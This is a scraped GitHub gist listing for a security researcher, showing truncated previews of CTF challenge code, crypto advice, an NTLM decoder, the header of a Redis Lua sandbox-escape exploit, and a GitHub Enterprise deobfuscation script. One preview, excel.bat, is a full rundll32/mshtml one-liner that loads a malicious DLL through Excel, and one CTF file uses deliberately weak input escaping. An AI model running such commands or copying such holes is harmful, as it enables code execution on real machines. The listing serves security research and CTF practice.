Orange Tsai orangetw

## app.py
#!/usr/bin/env python
#coding=utf-8
import web, settings

urls = (
    '/uploads/(.*)', 'download',
    '([a-z0-9\/]*)', 'dispatcher'
    )

class dispatcher:

## gist:eae51418694bcb34cbf7
**Encrypting data** (*Was: AES-CTR with HMAC*): Use, in order of preference: (1) The Nacl/libsodium default, (2) Chacha20-Poly1305, or (3) AES-GCM.

*You care about this if: you're hiding information from users or the network.*

All three options get you "AEAD", which is the only way you want to encrypt in 2015. Options (2) and (3) are morally the same thing: a stream cipher with a polynomial ("thermonuclear CRC") MAC. Option (2) gets there with a native stream cipher and a MAC optimized for general purpose CPUs; Poly1305 is also easier than GCM for library designers to implement safely. Option (3)'s AES-GCM is the industry standard; it's fast and usually hardware accelerated on modern processors, but has implementation safety pitfalls on platforms that aren't accelerated.

*Avoid: AES-CBC, AES-CTR by itself, block ciphers with 64-bit blocks --- most especially Blowfish, which is inexplicably popular, OFB mode. Don't ever use RC4, which is comically broken.*

**Symmetric key length** (*Was: Use 256 bit keys*

## index.php
<?php
    include "config.php";

    mysql_connect($dbhost, $dbuser, $dbpass);
    mysql_select_db($dbname);

    function escape($str){
        $str = strtolower($str);
        $str = str_replace("'", "", $str);
        $str = str_replace("\\", "", $str);

## sqlpwn.php
<?php
    /*
        sqlpwn by orange
        Don't brute force or you will be banned !
    */

    session_start();
    error_reporting(0);

    include "template.html";

## babyfirst.php
<?php
    highlight_file(__FILE__);

    $dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
    if ( !file_exists($dir) )
        mkdir($dir);
    chdir($dir);

    $args = $_GET['args'];
    for ( $i=0; $i<count($args); $i++ ){

## Advanced-HTTP-en.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              3 stars
            
          
                orangetw
                / Advanced-HTTP-en.md
            
            
              Created
              November 19, 2017 19:52
                — forked from nicolas-grekas/Advanced-HTTP-en.md
            
              
                Advanced handling of HTTP requests in PHP
              
          
    =========================================
Advanced handling of HTTP requests in PHP

Nicolas Grekas - nicolas.grekas, gmail.com

17 June 2011 - Last updated on 3 sept. 2011
Not updated any more on this gist. See:

English version: https://github.com/nicolas-grekas/Patchwork-Doc/blob/master/Advanced-HTTP-en.md


## ntlmdecoder.py
#!/usr/bin/env python

## Decodes NTLM "Authenticate" HTTP-Header blobs.
## Reads the raw blob from stdin; prints out the contained metadata.
## Supports (auto-detects) Type 1, Type 2, and Type 3 messages.
## Based on the excellent protocol description from:
##  <http://davenport.sourceforge.net/ntlm.html>
## with additional detail subsequently added from the official protocol spec:
##  <http://msdn.microsoft.com/en-us/library/cc236621.aspx>
##

## redis-lua-linux-x86-poc.py
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c

## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version

## excel.bat
REM rundll32 mshtml.dll HTA one-liner command:
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();

## ruby_revealer.sh
#!/usr/bin/sudo sh

## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.

## From `strings ruby_concealer.so`:
##
## > This obfuscation is intended to discourage GitHub Enterprise customers
## > from making modifications to the VM.
##
## Well, good, as long as its not intended to discourage *me* from doing this!
	#!/usr/bin/env python
	#coding=utf-8
	import web, settings

	urls = (
	'/uploads/(.*)', 'download',
	'([a-z0-9\/]*)', 'dispatcher'
	)

	class dispatcher:
	Encrypting data (Was: AES-CTR with HMAC): Use, in order of preference: (1) The Nacl/libsodium default, (2) Chacha20-Poly1305, or (3) AES-GCM.

	You care about this if: you're hiding information from users or the network.

	All three options get you "AEAD", which is the only way you want to encrypt in 2015. Options (2) and (3) are morally the same thing: a stream cipher with a polynomial ("thermonuclear CRC") MAC. Option (2) gets there with a native stream cipher and a MAC optimized for general purpose CPUs; Poly1305 is also easier than GCM for library designers to implement safely. Option (3)'s AES-GCM is the industry standard; it's fast and usually hardware accelerated on modern processors, but has implementation safety pitfalls on platforms that aren't accelerated.

	Avoid: AES-CBC, AES-CTR by itself, block ciphers with 64-bit blocks --- most especially Blowfish, which is inexplicably popular, OFB mode. Don't ever use RC4, which is comically broken.

	Symmetric key length (Was: Use 256 bit keys
	<?php
	include "config.php";

	mysql_connect($dbhost, $dbuser, $dbpass);
	mysql_select_db($dbname);

	function escape($str){
	$str = strtolower($str);
	$str = str_replace("'", "", $str);
	$str = str_replace("\\", "", $str);
	<?php
	/*
	sqlpwn by orange
	Don't brute force or you will be banned !
	*/

	session_start();
	error_reporting(0);

	include "template.html";
	<?php
	highlight_file(__FILE__);

	$dir = 'sandbox/' . $_SERVER['REMOTE_ADDR'];
	if ( !file_exists($dir) )
	mkdir($dir);
	chdir($dir);

	$args = $_GET['args'];
	for ( $i=0; $i<count($args); $i++ ){
	#!/usr/bin/env python

	## Decodes NTLM "Authenticate" HTTP-Header blobs.
	## Reads the raw blob from stdin; prints out the contained metadata.
	## Supports (auto-detects) Type 1, Type 2, and Type 3 messages.
	## Based on the excellent protocol description from:
	## <http://davenport.sourceforge.net/ntlm.html>
	## with additional detail subsequently added from the official protocol spec:
	## <http://msdn.microsoft.com/en-us/library/cc236621.aspx>
	##
	## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
	## Original exploit by corsix and sghctoma
	## Author: @c3c

	## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
	## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
	## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
	## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
	## This code is much the same, except the process is done using pwntools' DynELF
	## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
	REM rundll32 mshtml.dll HTA one-liner command:
	rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";x=new%20ActiveXObject('Excel.Application');x.RegisterXLL('C:\\Windows\\Temp\\evilDLL.log');this.close();
	#!/usr/bin/sudo sh

	## ruby_revealer.sh -- decrypt obfuscated GHE .rb files. 2.0.0 to 2.3.1+.

	## From `strings ruby_concealer.so`:
	##
	## > This obfuscation is intended to discourage GitHub Enterprise customers
	## > from making modifications to the VM.
	##
	## Well, good, as long as its not intended to discourage me from doing this!